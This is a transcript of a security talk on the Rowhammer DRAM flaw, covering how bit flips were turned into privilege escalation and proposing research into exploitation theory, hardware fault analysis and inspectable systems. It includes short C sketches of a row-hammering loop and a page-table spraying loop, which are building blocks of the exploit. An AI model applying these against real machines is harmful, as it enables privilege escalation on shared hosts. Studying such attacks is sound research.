Does the microphone work? Test, test, test. Can we also have this one? Great. Well, thanks a lot. It's impressive to see the growth of the Singapore infosec community; I was here for the first time, I think, in 2001, and have come back every few years since, and it's awesome to see meetups like this happening here.

So anyhow, my talk tonight (and thanks for showing up) is called Three Things that Rowhammer Taught Me, and it's about what this means for security research, at least for the areas that I find really interesting.

First off, who am I? I started reverse engineering in 1997, so I recently realized that it's been almost 18 years. I wrote my first exploit in 1999, and then I was very much hooked on vulnerability development and didn't do all that much else for the next couple of years. I ended up starting a company called zynamics in 2004, funnily enough with money I'd earned in Singapore by training people here, so Singapore has always had a very important place in my life when it comes to fundraising. We wrote a bunch of different tools for reverse engineers: BinDiff for patch analysis, much to the chagrin of Microsoft at the time, who really weren't very amused; BinNavi, a UI for reverse engineering; and VxClass, which was used for malware analysis. We ended up being acquired by Google in 2011, much to our surprise, because we would never have thought anybody would be crazy enough to acquire us. I worked at Google for the next four and a half years, trying to help defend Google, which clearly has a very large and complicated infrastructure, and worked a lot on large-scale malware analysis. Working at Google very much redefined my perspective on scale, because Google's way of doing computing is very different from the way everybody else thinks about computing. While it was a stressful experience, it was a very, very intellectually enriching one. I'm a mathematician by trade, which means I actually quite like theory, but what I like most is the border where theory meets practice. There are a lot of people in the hacker community who are a little bit averse to theory, and a lot of people in the academic community who are overly averse to practice; I really like the boundary between the two. And right now I'm on a sabbatical year, and my wife and I are traveling the world, reading and surfing and pretty much enjoying life.

Now, after talking about me: what is Rowhammer? Rowhammer was a fairly important security issue last year, or rather, it still is one, because Rowhammer is a fault in most DRAM chips, essentially all DDR3 non-ECC DRAM chips, where repeated activation of a memory row can cause bit flips in memory. Pretty much all major RAM vendors have the problem of their RAM being affected, and pretty much any RAM you've bought since 2010, if it's DDR3 and non-ECC, has Rowhammer issues. So a whole generation of hardware is affected, and it's a hardware flaw that is not patchable in the traditional sense. That's why it's not "what was Rowhammer" but "what is Rowhammer".

[Audience] Wasn't the paper written by a student?

Yes. There were many interesting things about Rowhammer. It started out with the effect actually being known in the chip-making community since 2011 or 2012 or so, and then in 2014 a student published a paper where he actually managed to reproduce it. So they bought RAM, and they had a specialized hardware setup with which they could measure whether the flaw was present.
Their hardware setup implied that the flaw is much more prevalent than people thought, but nobody could reproduce it on actual delivered machines. And then, well, I'll get into this: we actually managed to reproduce it on laptops and cause security issues through it.

So what is Rowhammer? A short note about my background: I have no idea about physics or electrical engineering; my physics knowledge is eighth-grade high school, essentially, so all of this was very new to me. But in short, the consensus seems to be that the issue is the following. You have to imagine DRAM as a lot of crossing wires arranged in a grid, and everywhere these wires intersect there is a small capacitor that stores a charge, and that charge means there's a one bit or a zero bit stored in memory. When you try to read out a piece of memory, you apply a current to one of the horizontal wires, and that current makes the semiconductors underneath it conduct, so the charge from each capacitor can flow out and you can read out the memory at the bottom. That is literally how DRAM works: you've got this big matrix of bits, you activate one row (applying the current is called row activation), and then you read out that row, which holds a certain number of bits. Then you need to write the values back, to refresh the row, because you've just drained the charge from it. That's the theory.

The trouble is that over time DRAM became denser and denser, and there was a standard that said: refresh the DRAM every 64 milliseconds. So at regular intervals, because these capacitors lose some charge, the memory controller would go to memory and refresh every single row. The DRAM got tighter and tighter, and the memory controller got faster and faster at talking to the DRAM; what hadn't really changed was the refresh interval, the time between moments when things have to be refreshed. And as memory cells got closer and closer together, what happened is that when you applied the current to the middle row, a little bit of charge would leak to the neighboring lines, and that would lead to a little bit of activation of the semiconductors on the neighboring rows, and then a little bit of charge flowing away. So if you activated a row repeatedly, hammering that row as aggressively and as fast as the CPU can possibly do it, you could make the memory start forgetting bits (a minimal sketch of such a hammering loop follows below). It was a probabilistic effect that would only happen in certain parts of DRAM, so what you would do is literally sweep through memory, hammering at different intervals, seeing whether occasionally a bit would flip. And that's pretty nasty, because all of our computing architecture, all of our operating systems, everything goes out the window; all security guarantees and all security boundaries go out the window as soon as you can get bits to flip.

Now, the DRAM community, or the electrical engineering community, knew that row hammering could happen, but they only perceived it as a reliability issue. They figured: as long as nobody intentionally tries to cause this, there's no issue, and we don't need to worry too much about it.
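To make the hammering loop concrete, here is a minimal sketch in C under some assumptions: addr_a and addr_b are assumed to have already been chosen so that they hit two different rows of the same DRAM bank, and the function and variable names are mine, not the original exploit's (which did this in a short assembly loop). The cache flushes are what force every read to actually reach DRAM and re-activate the rows.

    #include <emmintrin.h>   /* _mm_clflush */
    #include <stdint.h>

    /* Hammer two rows: each iteration activates the row behind addr_a
     * and the row behind addr_b. Without the clflush calls the reads
     * would be served from cache and never touch DRAM at all. */
    static void hammer(volatile uint32_t *addr_a,
                       volatile uint32_t *addr_b,
                       long iterations)
    {
        for (long i = 0; i < iterations; i++) {
            (void)*addr_a;                       /* row activation #1 */
            (void)*addr_b;                       /* row activation #2 */
            _mm_clflush((const void *)addr_a);   /* evict from cache */
            _mm_clflush((const void *)addr_b);
        }
    }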
Amusingly enough, the electrical engineering community became aware of this because somebody wrote regular code that accidentally triggered it. Some of the RAM out there was really quite bad, and only when bits started randomly flipping in the field did people figure out that this was an actual problem. So row hammering was deemed non-exploitable and only a reliability issue.

Then Mark Seaborn and I, both at Google at the time, started looking into this. Mark had managed to reproduce the bit flips on a laptop. A lot of people didn't want to believe that this was actually reproducible on a regular laptop. So Mark and I went to one of the storage places at Google, where you can ask for hardware: when you lose your laptop, you can ask for a new corporate laptop, and so forth. We essentially got all the laptops they had and started testing them, and that day three or four of the ten laptops we had checked out started flipping bits. As soon as you have a patient zero (we called it Flippy the laptop, since it was the first laptop to exhibit these flips), you can start optimizing your code, because now you've got something to work with. And we got very, very good at causing bit flips. More or less all of our ThinkPads were affected, and large parts of the rest of the fleet. We ended up finding a way to abuse random bit flips to cause privilege escalation on x86 systems. The underlying idea works for pretty much any of the major operating systems, meaning Linux, Windows and OS X, but we only implemented the Linux variant.

Now, a valid question is: how would you exploit a random bit flip? For this we have to go back to our operating systems manual and remember that there is something called page tables. Page tables are responsible for translating virtual addresses to physical addresses in actual memory, and they're also responsible for storing access permissions, like which process can access which memory page. A page table consists of a bunch of entries called, unsurprisingly, page table entries. They're 64 bits long and have roughly the layout sketched below. Now, we can pretty much ignore everything in this layout; our question is rather: let's assume we could fill all of memory with page table entries and then a random bit would flip. What is the probability of that random bit flip being useful? If you examine this data structure, there are two places where a random bit flip is going to be very useful. For one, there's the privilege bit. The privilege bit is naturally useful, but it's only one bit out of 64, so that's a very crappy rate of success, because you would need to hit exactly the right bit. But then there's this thing, the physical page base address. The physical page base address essentially says: the virtual address you're accessing maps to this physical page in RAM. If you have a bit flip anywhere in the physical page base address, then all of a sudden your virtual address will map to a different page in RAM, one you shouldn't have access to. And as soon as you get read-write access to memory that you shouldn't have access to, you're on your way to a privilege escalation. At a 30% success chance, those are fairly good odds.
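To make the layout concrete, here is a sketch of the relevant fields of an x86-64 page table entry as described above, following the Intel manuals; the macro names are mine. The point is visible directly in the mask: bits 12 through 51 all belong to the physical page base address, so a flip in any one of them retargets the mapping, while the privilege bit is a single bit.

    #include <stdint.h>

    /* Selected bits of a 64-bit x86-64 page table entry. */
    #define PTE_PRESENT    (1ULL << 0)
    #define PTE_WRITABLE   (1ULL << 1)
    #define PTE_USER       (1ULL << 2)    /* the privilege bit: user vs. supervisor */
    #define PTE_NX         (1ULL << 63)   /* no-execute */

    /* Bits 12..51: the physical page base address. A flip anywhere in
     * here makes the virtual page point at a different physical page. */
    #define PTE_ADDR_MASK  0x000FFFFFFFFFF000ULL

    static inline uint64_t pte_phys_base(uint64_t pte)
    {
        return pte & PTE_ADDR_MASK;
    }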
So the strategy of the exploit was, more or less: spray all of physical memory with page tables, and the way to do this is with a memory-mapped file. A memory-mapped file is a file on disk backed by physical pages; when those pages are modified, the operating system takes care of synchronizing them with the file. And we mapped the same file over and over again. You can map the same file over and over again, which means the physical pages holding the file's data will be in physical memory only once; but because you map it over and over, the operating system needs to allocate address space for it over and over, which means it needs page table entries, which means you can fill essentially all of physical memory with page table entries. So you literally have the file, a little bit of your operating system, and then all the rest of your physical memory is page table entries (a sketch of this spraying loop follows below). At that point, if you flip a bit, you have a 30% chance of hitting something useful, and you will get read-write access to another random physical memory page. That other random physical page, though, will contain page tables, because all of physical memory is full of page tables. And now you've got read-write access to page tables, which means you can map anything anywhere, get read-write access to all physical memory of the system, and you're done. If it's not intuitive yet, there's a diagram explaining this in the appendix.

Anyhow, the beauty of this trick is that it means you can exploit a completely random bit flip; we don't even need to know anything about where the bit flip occurs. If you fill all of memory with page table entries, and a cosmic ray hits your computer, or, I don't know, you have a spontaneous decay of some radioactive element that somebody put into your RAM, and a bit flips, then you still have a 30% chance of the attacker actually getting control. Those are surprisingly good odds for something that is inherently super random.

So what did the exploit actually do? It filled all of physical memory. It then started hammering memory for a while to see whether it was causing bit flips. It then scanned through the memory it had mapped to see whether any of it was out of order now, pointing to places it shouldn't. And if it found that one of the memory mappings had become unusual, it would identify where that mapping now pointed, and then abuse it. We're talking about, I would say, eight to twelve weeks of work to get this going. Realistically, the technical part was the smallest thing; the political nightmare that ensued thereafter, when we tried to tell people, hey, most of your RAM is broken, took many months and was very unpleasant.

So Rowhammer was quite important for me, because I thought I knew quite a bit about security, and Rowhammer carried a number of lessons that quite fundamentally changed the way I think about computing and about security. In a way, Rowhammer may have been a very interesting trick, but the implications of Rowhammer are the really interesting thing, and what I actually want to talk about today is not Rowhammer itself but its implications for security and security research.

So, the first lesson, and the lesson we all need to always keep in mind: one bit flip is enough. If the attacker does not need 100% reliability, one flipping bit will, for most computing systems, mean complete failure of all security mechanisms. One of the biggest problems with Rowhammer was that, before Mark and I started working on this, most of the industry assumed that a random bit flip would not be exploitable.
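Here is a minimal sketch of the spraying step described above, assuming a small file named "sprayfile" has been created beforehand (the file name and sizes are my choices, not the original exploit's). The data pages of the file are shared between all mappings, but each new mapping forces the kernel to populate fresh page table entries, which is what gradually fills physical memory with page tables:

    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>

    int main(void)
    {
        int fd = open("sprayfile", O_RDWR);
        if (fd < 0) { perror("open"); return 1; }

        size_t len = 2 * 1024 * 1024;    /* 2 MB: roughly one page-table
                                            page of PTEs per mapping */
        for (;;) {
            void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                           MAP_SHARED, fd, 0);
            if (p == MAP_FAILED)
                break;                   /* address space or memory exhausted */
            /* Touch one byte per page so the PTEs actually get populated. */
            for (size_t off = 0; off < len; off += 4096)
                ((volatile char *)p)[off] = 1;
        }
        return 0;
    }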
I have to give a lot of credit to my then boss at Google, Eric Grosse, who said: if you can flip a bit, I believe you immediately that you can turn this into an exploit. He understands quite well how exploitation works, but most of our industry is still quite skeptical about how little is required to get an exploit. The important thing to always keep in mind is: a single bit flip is enough.

We're not the first ones, it turns out, to exploit single bit flips. There's a 2003 paper called "Using Memory Errors to Attack a Virtual Machine" where the authors managed to break out of a Java VM by causing random bit flips in memory; and in order to produce those random bit flips they didn't have Rowhammer, so they actually strapped a heat lamp to the RAM of a desktop machine, to heat it beyond its specified temperature and make it less reliable. So we have a pattern where, over a period of twelve years, the lesson that a single bit flip is enough gets forgotten and then rediscovered, and we just need to stop forgetting that lesson, because a single bit flip will be enough.

The other really, really important lesson is that deterministic computing is an abstraction. It's the abstraction we all think in and the abstraction we're taught. It's a good abstraction, but in the end, physics rules everything around me: computers are not actually deterministic at all times. We think of them as deterministic machines, but they are probabilistically deterministic, meaning deterministic most of the time. The way they're engineered is that the probability of random non-determinism is made very, very low in practice, but they are not engineered to keep the probability of non-determinism low against malicious input. In the average case of somebody not using the computer maliciously, it will not exhibit non-deterministic behavior; but the engineering trade-offs and the engineering processes are not optimized against a malicious attacker. It's like your car: on average, your car will not fail when you drive it down the speedway, but if you've got a malicious driver who intentionally tries to damage the car, the odds of failure are much, much higher. That's something all the hardware engineers know, but few software engineers seem to realize it, and because security people and hardware people don't always talk to each other, it doesn't really enter the picture.

There are millions of examples of this. Look at flash and wear-leveling in flash. We all know that flash doesn't allow an arbitrary number of writes, so all the flash drives and so forth do wear-leveling, spreading the writes over the whole memory stick. Now, if you knew the wear-leveling algorithm and you picked your writes maliciously so that the same memory cell gets hit all the time, you could probably wear out a USB stick pretty damn quickly. And when you wear out a USB stick, that probably means you can get bits to flip on the flash drive. So if there's any data on that flash drive that is trusted by some other, privileged component of the system, you can flip a bit, and a single bit flip is enough. We most likely have issues like this in flash and in other hardware components.
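As a purely hypothetical sketch of the write-pressure half of that idea (the hard, device-specific part, modeling the proprietary wear-leveling remap so that the same physical cell keeps getting hit, is not shown, and is exactly the open question):

    #include <fcntl.h>
    #include <unistd.h>

    /* Rewrite the same logical block over and over, forcing each write
     * out to the device. Wear-leveling will remap these writes across
     * physical cells; defeating that remapping is the attacker's real
     * problem. */
    static void wear(int fd, off_t offset, const char *buf,
                     size_t len, long rounds)
    {
        for (long i = 0; i < rounds; i++) {
            pwrite(fd, buf, len, offset);
            fsync(fd);   /* push the write out of the page cache */
        }
    }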
If you look at the way CPUs are made: CPUs are made on these big wafers, and there are hardware imperfections, silicon imperfections, just process variations, and the CPU manufacturers test every single CPU for how fast it can be clocked without starting to fail. Then they bin the CPUs depending on these tests and sell them at different prices. But this also means that the hardware vendors are incentivized to sell chips right at the boundary of working reliably: any chip they don't sell because they're too prudent cuts into the profit margins significantly. Why did all the RAM vendors sell bad RAM? Because it was too expensive for them to discard RAM that can be made to fail. So we have economic incentives that work drastically against secure systems, and that's super interesting for us.

And cloud computing, or the move to cloud computing, changes the risk calculus of all of this. In the past you'd say: so what if one in a thousand CPUs has an issue? I'm not going to be able to attack somebody just because one in a thousand CPUs has an issue. With cloud computing, I can go to Amazon and rent 5,000 CPUs, and one of them will have the issue; and Amazon needs to defend in spite of the risk that one in a thousand CPUs doesn't actually implement the spec it should be implementing. As an attacker, you can play a very low-probability game over and over again, and any low-probability game that you can play arbitrarily often, you asymptotically win. So deterministic computing is an abstraction, and that's a very bizarre lesson to learn. Talk to any hardware engineer and he laughs and says, oh, I always knew this. But it turns out that as a computer science or math person, you don't really know it, not in an intuitive sense.
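The reason a low-probability game played arbitrarily often is an asymptotic win is just the complement rule. With per-trial success probability p and n independent trials:

    P(\text{at least one success}) = 1 - (1 - p)^n \longrightarrow 1 \quad (n \to \infty)

For example, with p = 1/1000 and n = 5000 rented CPUs, 1 - 0.999^{5000} is approximately 0.993: near certainty, built out of a one-in-a-thousand flaw.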
The third lesson, another very important one, is that the idea of impenetrable defense is not a very useful concept, in the sense that your chip may have a secure enclave, but you don't know whether the chip actually implements its specification all of the time. The odds of some chip failing non-deterministically, and then having a security issue even though everything else has been formally verified, are real. And if you take the previous point seriously, that computers are only average-case deterministic, then the entire concept of secure enclaves that nobody can look into may be a doomed and very harmful concept. If you look at the secure enclaves these days, there's a big push towards TrustZone, or Intel SGX, or the Management Engine, or whatever: very small components that are completely opaque to the outsider and that are supposed to be the roots of trust and provide security for everybody. The trouble is that even if you formally verify all the code running in the secure enclave, the formal verification goes against a specification of the semantics of what the CPU should be doing; but the CPU will only adhere to those semantics 99-point-something percent of the time, and the small windows where the CPU does not adhere to the semantics may be enough for the attacker to exploit it.

And this is dangerous, because the secure enclaves are engineered so that nobody can look inside them. If you accept that you cannot reliably keep the attacker out, but you force a component that is non-inspectable into every machine, that means you will get attackers that get into the machine, and you'll never be able to get them out again, or even tell that they are there. This problem, of us building more opacity into already overly opaque systems, is a significant problem. I like to call this Schrödinger's hack: as the current computing infrastructure stands, if somebody gives you a device, nobody on earth can tell you whether this device is currently compromised or not. And that's insane. It's really insane, because if I give you a car, you know you're now in control of that car. Well, not anymore, with all the chips in cars, but if I give you an analog car, a Lada from the 80s, then you know you're in control of that car; with our devices this is no longer the case.

So we've got these three lessons from Rowhammer, and each of them highlights a different and interesting area of research in computer science, electrical engineering and software engineering, and I'd like to talk about those. Interestingly, the three research areas that Rowhammer highlighted for me are spread out quite evenly: there's one research area in theoretical computer science that we really need to look at; there's a very interesting border between electrical engineering, statistics, physics and computer science that we need to look at; and then there's really interesting systems engineering that needs to be done. I'll talk about all three now.

The first research area, the theoretical computer science one: we really need a proper theory of exploitation in computer science. Right now the theoretical understanding of exploitation is weak; nobody can even provide a proper definition of what exploitation means. That's a problem, because misjudgment by seasoned practitioners about whether something constitutes a security vulnerability is very, very common, and when big hardware vendors make the mistake of discounting Rowhammer as a reliability issue, that shows we're lacking the fundamental theorems, something like the halting problem in other areas of computer science. We have no good theoretical framework to analyze which issues are exploitable and which are not, where the boundary between the two lies, what makes one issue non-exploitable and another exploitable, or what facilitates exploitability. And we get a lot of really negative consequences from this: misjudgments by management about risk, bad mitigations (mitigations that don't actually stop the attacker but carry a cost for the consumer) being implemented, and so forth.

My suggestion on how to tackle building such a theory would be to assume a tiny toy CPU; I intentionally stay away from the Turing machine abstraction, because it's cumbersome in this particular situation.
So you assume a small CPU with a finite array of memory cells, a few registers and more or less six instructions: a peek and a poke, meaning read and write from memory; an addition operation; a conditional branch; and receive and send, which move a value into or out of the system. This is the CPU you look at theoretically (a concrete sketch of such a toy CPU follows below). The programmer who writes an application has a finite state automaton that represents the application, and emulates this finite state automaton on that CPU. That's what happens nowadays: if I write a mail server, there's a set of states of a mail server that are valid, so I write a C program that emulates these states, and unfortunately there are extra states, so my system is exploitable. So in the theoretical view, the programmer emulates the finite state machine on the toy CPU, the attacker gets to choose an arbitrary valid state of this emulated state machine, and then the question is: if a random bit flipped now, what is the probability of the attacker being able to reach any possible state of the toy CPU?

What I'm trying to get at is this: you've got the finite state machine, with transitions between its states; but once you flip a bit, a state is entered that should never exist, and the attacker, by continuing to send data, can still execute the transitions on that nonsensical state, turning it into an even more nonsensical state, and so forth. My intuition, my suspicion, is that if the state machine is non-trivial, meaning it contains something like a linked list, then a single bit flip is probably enough for an attacker to reach any possible state of the toy CPU. This is not proven; it's just my suggestion for where to start if you were to try to build a proper theory of exploitation, and where I will start if I ever get the time for it.

Anyhow, if we had a proper theory of exploitation, it would give us many, many useful things. First of all, we could start distinguishing useful from non-useful mitigations. I have spent a lot of time in my life kicking stupid mitigation ideas to death, because people who have never written an exploit come up with an idea and say: if we just do my idea, then exploits won't be a problem anymore. So first of all, we would be able to identify bad ideas. It would also help us understand what level of complexity makes a system exploitable, and how simple we have to make a system for it to be non-exploitable. And it would finally put exploitation on a sound footing in academia, because right now it is, in a way, magic: obscurity and magic. The lack of formality and the lack of proper understanding then lead to problems in very strange areas; they lead to problems, for example, in policy circles, where traffic in exploits is being regulated with weapons-control legislation just because it looks like magic. It's not magic, it's computer science; it's just badly formalized computer science, in the sense that we haven't actually quite understood it yet. Anyhow: the first research area highlighted by Rowhammer is that somebody needs to go and write a proper theory of exploitation.
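As a concrete rendering of the toy CPU described above, here is a sketch; the opcode names, the encoding, and the register and memory sizes are all my own invention for illustration:

    #include <stdint.h>

    enum op { PEEK, POKE, ADD, BRANCH_IF_ZERO, RECV, SEND };

    struct insn { enum op op; int a, b; };   /* two operands suffice here */

    #define MEM_SIZE 256
    #define NREGS    4

    /* Run a program until the program counter leaves it. recv/send are
     * the system's only contact with the outside world, i.e. with the
     * attacker; operands are assumed to name valid registers. */
    static void run(const struct insn *prog, int prog_len,
                    uint8_t mem[MEM_SIZE], uint8_t reg[NREGS],
                    uint8_t (*recv)(void), void (*send)(uint8_t))
    {
        for (int pc = 0; pc >= 0 && pc < prog_len; pc++) {
            const struct insn *i = &prog[pc];
            switch (i->op) {
            case PEEK: reg[i->a] = mem[reg[i->b] % MEM_SIZE]; break;
            case POKE: mem[reg[i->b] % MEM_SIZE] = reg[i->a]; break;
            case ADD:  reg[i->a] = (uint8_t)(reg[i->a] + reg[i->b]); break;
            case BRANCH_IF_ZERO:
                if (reg[i->a] == 0) pc = i->b - 1;   /* -1: loop will ++ */
                break;
            case RECV: reg[i->a] = recv(); break;
            case SEND: send(reg[i->a]);    break;
            }
        }
    }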
The second big research area that Rowhammer highlighted for me: we need good research on worst-case analysis of integrated circuits, of chips. We need analysis of the degradation, the wear and tear, of chips over time, because we treat chips as if they were immutable solid-state devices, but they're not. If you're mean to a chip for long enough, individual atoms will dislodge and accumulate elsewhere on the chip, which actually affects switching speed, and through this the behavior of the chip. We need ways of understanding how you have to treat a chip to achieve non-determinism, how you can abuse the chip enough to achieve non-determinism, because with cloud computing, JIT'ed code everywhere, sandboxing and so forth, the instruction stream of the CPU needs to be treated as malicious input. If you run a cloud infrastructure, your attacker can run code on your CPU. When people designed integrated circuits, they never imagined that the attack model against the chip would be the code running on the chip.

The way CPUs are built currently: you have the wafer manufacturing process over many, many weeks (I think the length of a production cycle for a wafer of chips is something like 10 to 12 weeks now), and at the end they measure the chips, discard those that are not working, bin the working ones depending on their performance characteristics, and sell them off. The IC manufacturers optimize for maximum yield without random failure: they don't want their customers to complain about the chip randomly doing the wrong thing. But their incentive model does not take into account a malicious person trying to cause maximum harm on the chip. So the research area is finding malicious ways of executing code on the chip, doing things that do maximum harm to the chip and violate the assumptions of the design in the worst possible way.

The electrical engineering community does a lot of really interesting research on speed and voltage binning and on testing their chips; there are billions of dollars riding on that topic for reliability, so they have a lot of fantastic research on it. It's just that nobody outside the community reads it and understands it. So basically we need to go and read a lot of that stuff, and then we need security research on identifying critical speed paths in silicon, and on identifying critical areas for crosstalk in silicon. Crosstalk is the effect where you activate one line and all of a sudden some charge leaks over to the neighboring lines and weird stuff happens. These are things you can't really do from the specification, from the VLSI design; you probably need to look at the chip itself, the way it is laid out, the distances between individual gates, and then start reasoning about how that works. And after you've identified the sketchy parts of the chip, you need to go back and figure out: how can we send input into the chip that causes these faults? Can the critical path be made more critical by intentionally causing some transistor degradation? Can I rent a computer, make it do something bizarre for a year so that the CPU is worn out in a particular part, and then cause crosstalk elsewhere on the CPU? Nobody can answer these questions right now, and that's a pity. It may end up being economical: if you're trying to attack a cloud provider, and everybody keeps their useful data with a cloud, it may be economical to rent a thousand CPUs on Amazon or Google or wherever for a year and just try to cause one of those CPUs to degrade enough in that year to become useful to you.

It looks like an extremely fruitful area of research, because the IC manufacturers are in a very tough spot: the margins for most integrated circuits are not very big.
Intel has healthy margins, but everybody else is not making much money. They can't afford to test a single chip for very long: the chip comes off the production line, needs to be tested, and then needs to be shipped. They can't run a three-month burn-in on the chip to see whether it will perform well in all situations. So the attacker can profit from the very small fraction of CPUs that come out of this faulty, and even if those faults only manifest once a month, even if only one in a thousand CPUs has a flaw that manifests itself once a month, that is still going to be useful for me as an attacker. And that's really exciting. The other thing is that the chip manufacturers cannot be arbitrarily careful, because care directly cuts into the profit margins, and money is at stake; their business model more or less depends on them not being overly careful.

It's going to be interesting research, because you'll need collaboration between security people and people who know not only VLSI design but also the manufacturing process, the variations in chips induced by the manufacturing process, and yield optimization. I think the biggest problem is actually getting somebody who knows this to collaborate with you, because most of them have signed an NDA at some point in their life and are not allowed to. And this sort of research may also require a budget, because hardware investigation is expensive; building a chip fab is now at something like three or four billion, so even inspecting simple things is going to be expensive. I would love to investigate this, but I have no idea about electrical engineering, and I would need a collaborator who is very, very patient. Another thing I expect to happen: the semiconductor industry is not going to be a fan of you if you do this. They will lobby very aggressively against this stuff ever reaching the public. I think they were very unhappy that Rowhammer even became public; they would have liked it to never see the light of day. It's an incredibly competitive and secretive industry; there's the famous former Intel chairman, Andy Grove, who coined the motto "only the paranoid survive", and the entire industry lives by that motto. I was very impressed by their rigor. So doing this will involve picking a fight.

The third big research area that Rowhammer highlighted for me is the problem of building inspectable systems; I think that only through inspectability will we reach defendability. What do I mean by this? In the real world, you've got the concepts of ownership and possession: I can legally own a car, and I can be in possession of a car. If I rent a car, the rental company is the legal owner, but I am in possession, because I currently have the car and have control over it. Now, IT systems have a third dimension, and that third dimension is underappreciated: control. I can have both ownership and possession of a computing device without being in control of it. Look at a cell phone, an iPhone say: if it has auto-update functionality, then I own the thing, I am in possession of the thing, yet somebody else can, at an arbitrary point, do whatever they want with it. So I am not actually in control of that device. And the trouble is that we've built all our computing infrastructure in a way that makes it impossible to determine who is currently in control of a system. Nobody in the world (that's what I meant with Schrödinger's hack earlier) can tell you whether a particular device is hacked or not.
You can make reasonable guesses, like: I don't see anything suspicious here. But you don't actually know, and there is no way to establish it with any reasonable certainty. So in today's systems it's impossible to establish who is in control. And you've got hardware enclaves making their way into every piece of hardware now, trying to prevent the loss of control; but we know that this can never be 100%, because physics rules everything around me. At some point the enclave will fail, and then I may have a device for which I can never again establish whether I'm still in control of it.

So if we actually want defendable systems, we need to build systems where it's possible for the person in possession of the device to establish who is in control of the device. I need to be able to do something to the device in my hand such that afterwards I know it's not hacked. We try to approximate this by reinstalling operating systems and re-imaging, but we all know it's a lie: there are BIOSes, there are chips, there's firmware. It's make-believe; we pretend we're getting rid of something when we know that if the attacker actually wants to stay, he will stay. What this means is that we need to engineer systems, from the ground up, in which any piece of code in the system can be checksummed, and the infrastructure for checksumming the code needs to be non-updatable and tamper-evident, meaning there must be no way to disable or update the checksumming mechanism without it becoming evident to the user. That goes against the prevailing trend in most systems, where everything is being made updatable and a chip gets put into everything. I read an article a year or two ago about a guy running Linux on his hard disk: not installing Linux on a hard disk, but running Linux on the embedded controller that controlled his hard disk. We get chips and chips and chips; every device now is a network of different computers, every computer is a network of networks of computers, all of them with updatable code, and nobody knows what is running where and where it came from. That's just an untenable situation.

So we need to engineer systems where every place that can contain code can be inspected, and we need to build a public ledger, very similar to the Certificate Transparency ledger that Google has built, but perhaps with a working gossip protocol, or something similar to Bitcoin: a public infrastructure where all code signatures can be stored. If Microsoft signs an update, that update needs to be placed in the public ledger, because otherwise their signing keys will get stolen, or the FBI or somebody else will coerce them into handing over the signing keys, and then malicious code can be signed and everybody can be hacked, and there's no way to ever diagnose that this is happening. So there needs to be a public ledger where all code signatures, every piece of code that is signed and trusted, are stored.
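As a toy sketch of such an append-only log: each appended signature commits to the previous head, so history cannot be silently rewritten without every later hash changing. The hash here is FNV-1a, a stand-in only; a real ledger would use a cryptographic hash and a Merkle tree, as Certificate Transparency does.

    #include <stddef.h>
    #include <stdint.h>

    /* 64-bit FNV-1a, seeded with the previous head. NOT cryptographic;
     * illustration only. */
    static uint64_t hash64(const void *data, size_t len, uint64_t seed)
    {
        const uint8_t *p = (const uint8_t *)data;
        uint64_t h = seed ^ 14695981039346656037ULL;
        for (size_t i = 0; i < len; i++) {
            h ^= p[i];
            h *= 1099511628211ULL;
        }
        return h;
    }

    struct ledger { uint64_t head; };

    /* Appending commits to everything before it: altering an old entry
     * forces a new head, which is exactly the tamper evidence we want. */
    static void ledger_append(struct ledger *l, const void *sig, size_t len)
    {
        l->head = hash64(sig, len, l->head);
    }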
Interestingly, this last bit is not research, it's just engineering; but "just engineering" still means that somebody has to do it. The first two areas are more interesting in a way, because they involve both software and hardware design, and this third one is going to be product design and hardware design and usability design and all these things. We need to get rid of the current trend of adding more opacity to our systems: we already can't tell whether something is hacked, and adding more small black boxes to the system is a bad idea. In a world where all signing keys can be stolen or coerced, we need a public infrastructure to monitor code signatures, and we need the possibility of establishing the origin of all code running on a machine. If we can't do that, then we may as well go home, because if we can't establish who's in control of a machine, all discussions about security turn into something called scholasticism. That was something that happened in medieval Europe: because they didn't have the scientific method, the monks of the time argued about questions like, if we had a needle here, how many angels could dance on the head of its pin? And because there was no way of ever verifying any of it, everybody could write a lot about it, and everybody could have a great career as a scholar without any progress whatsoever. We risk the same thing in security, because we are all arguing about something that is fundamentally unknowable at the moment.

Right, so, summary. Rowhammer is interesting, but the implications of it are much more interesting than Rowhammer itself; Rowhammer is a symptom of much bigger issues at play. Computer security is funny: when I started doing this in 1999, I was convinced this was not a worthwhile career, that it would be over in four or five years. Yeah. It's not going to be gone anytime soon, and it seems that the problems get more intricate and more bizarre, because the technological growth curve and the speed of digitization are still much higher than our progress in understanding systems. We're building systems and digitizing the world at a much faster rate than we can protect it, so the problem is only getting worse, and the problems are getting more interesting. The collaboration between disciplines gets more and more critical: all the things I discussed require security to work with electrical engineering, or with theoretical computer science, or with the product design people. Computer security seems to be like a lens into which all areas of computer science get focused into one point; if any of those areas fails, then security fails, and that's interesting in itself.

Anyhow, if you find any of this interesting and want to talk with me about it, send me an email (thomas.dullien@gmail.com); I'm currently traveling, and hence my internet is not always that great. Specifically, if anybody has expertise in VLSI chip design, yield optimization or any of this and can enlighten me on any of that, I'm extremely keen to meet you; if not, I'm still keen to hear from you. Any questions? Yes.

[Audience] What was the response from the industry?

So the response from the industry was: we've known about this, and please don't talk about it. Sorry, de facto, I was being a little bit mean just now. The response was: we know about this, it is no longer a problem in the next generation of chips, and we didn't realize it was a security issue. I'm unfortunately not in a position to discuss the politics of it in much detail, because I was employed and under NDA, and all of this is kind of complicated. But by and large, a lot of the hardware manufacturers were clearly not very happy that this came out at all; a lot of them were of the opinion that if it's unpatchable, then it shouldn't be talked about. Which is a cultural thing; there's just a difference in culture between the computer security folks and the hardware folks. At the beginning of computer security, software people were also arguing that such things should never be discussed at all.
So I think hardware just hasn't dealt with these security issues in the same way that our community has.

